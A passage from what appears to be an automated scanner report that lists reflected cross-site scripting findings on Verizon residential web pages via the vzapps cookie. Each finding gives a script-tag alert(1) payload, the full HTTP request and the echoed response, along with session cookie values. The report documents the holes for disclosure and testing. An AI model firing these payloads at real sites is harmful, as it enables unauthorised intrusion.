Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:54 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX1817E<SCRIPT>ALERT(1)</SCRIPT>DABAD9477E </DIV>
...[SNIP]...

3.225. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c400'><script>alert(1)</script>5e2533e5388 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8c400'><script>alert(1)</script>5e2533e5388; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 199734
Expires: Sat, 20 Nov 2010 00:10:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:20 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8C400'><SCRIPT>ALERT(1)</SCRIPT>5E2533E5388 ' />
...[SNIP]...

3.226. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload abbca<script>alert(1)</script>27fec1e0170 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXabbca<script>alert(1)</script>27fec1e0170; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 201240
Expires: Sat, 20 Nov 2010 00:11:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:08 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:08 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:08 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:08 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:08 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXABBCA<SCRIPT>ALERT(1)</SCRIPT>27FEC1E0170 </DIV>
...[SNIP]...

3.227. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 33cf3<script>alert(1)</script>f0cf15e82f9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX33cf3<script>alert(1)</script>f0cf15e82f9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 308864
Expires: Sat, 20 Nov 2010 00:12:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:55 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX33cf3<script>alert(1)</script>f0cf15e82f9; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:55 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX33CF3<SCRIPT>ALERT(1)</SCRIPT>F0CF15E82F9 </DIV>
...[SNIP]...

3.228. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70270'><script>alert(1)</script>55b92e6b12d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX70270'><script>alert(1)</script>55b92e6b12d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 307358
Expires: Sat, 20 Nov 2010 00:12:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX70270'><script>alert(1)</script>55b92e6b12d; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX70270'><SCRIPT>ALERT(1)</SCRIPT>55B92E6B12D ' />
...[SNIP]...

3.229. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 4a3fe<script>alert(1)</script>8693fabb78c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4a3fe<script>alert(1)</script>8693fabb78c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 202315
Expires: Sat, 20 Nov 2010 00:16:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:05 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:04 GMT; path=/
Set-Cookie: ContextInfo_State=TX4a3fe<script>alert(1)</script>8693fabb78c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:04 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:04 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:04 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4A3FE<SCRIPT>ALERT(1)</SCRIPT>8693FABB78C </DIV>
...[SNIP]...

3.230. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fb11'><script>alert(1)</script>c9082fb4a68 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX2fb11'><script>alert(1)</script>c9082fb4a68; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 202319
Expires: Sat, 20 Nov 2010 00:16:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX2fb11'><script>alert(1)</script>c9082fb4a68; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX2FB11'><SCRIPT>ALERT(1)</SCRIPT>C9082FB4A68 ' />
...[SNIP]...

3.231. http://www22.verizon.com/Residential/Internet/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Internet/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload a439f<script>alert(1)</script>4e7b1405640 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Internet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa439f<script>alert(1)</script>4e7b1405640; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73116
Expires: Sat, 20 Nov 2010 00:11:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXa439f<script>alert(1)</script>4e7b1405640; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXA439F<SCRIPT>ALERT(1)</SCRIPT>4E7B1405640 </DIV>
...[SNIP]...

3.232. http://www22.verizon.com/Residential/Internet/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Internet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18609'><script>alert(1)</script>38eb9406858 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Internet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX18609'><script>alert(1)</script>38eb9406858; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73121
Expires: Sat, 20 Nov 2010 00:10:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX18609'><script>alert(1)</script>38eb9406858; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX18609'><SCRIPT>ALERT(1)</SCRIPT>38EB9406858 ' />
...[SNIP]...

3.233. http://www22.verizon.com/Residential/Services/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Services/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a33c2'><script>alert(1)</script>e9e9cf39ae6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa33c2'><script>alert(1)</script>e9e9cf39ae6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 55449
Expires: Sat, 20 Nov 2010 00:16:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXa33c2'><script>alert(1)</script>e9e9cf39ae6; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet | Essential Services
</title><meta name="keyword" content="verizon internet security, online backup, online sharing, file sharing
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXA33C2'><SCRIPT>ALERT(1)</SCRIPT>E9E9CF39AE6 ' />
...[SNIP]...

3.234. http://www22.verizon.com/Residential/Services/BackupandSharing/BackupandSharing.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Services/BackupandSharing/BackupandSharing.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2a62'><script>alert(1)</script>712158990f3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/BackupandSharing/BackupandSharing.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXd2a62'><script>alert(1)</script>712158990f3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60755
Expires: Sat, 20 Nov 2010 00:16:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:09 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXd2a62'><script>alert(1)</script>712158990f3; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Essential Services: Backup and Sharing
</title><meta name="keywords" content="back up pc, backup pc, pc backup, back up Mac, back up Macin
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD2A62'><SCRIPT>ALERT(1)</SCRIPT>712158990F3 ' />
...[SNIP]...

3.235. http://www22.verizon.com/Residential/Services/SecuritySuite/SecuritySuite.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Services/SecuritySuite/SecuritySuite.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7daef'><script>alert(1)</script>c934f3f7b2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/SecuritySuite/SecuritySuite.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX7daef'><script>alert(1)</script>c934f3f7b2c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64651
Expires: Sat, 20 Nov 2010 00:16:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:17 GMT
Connection: close
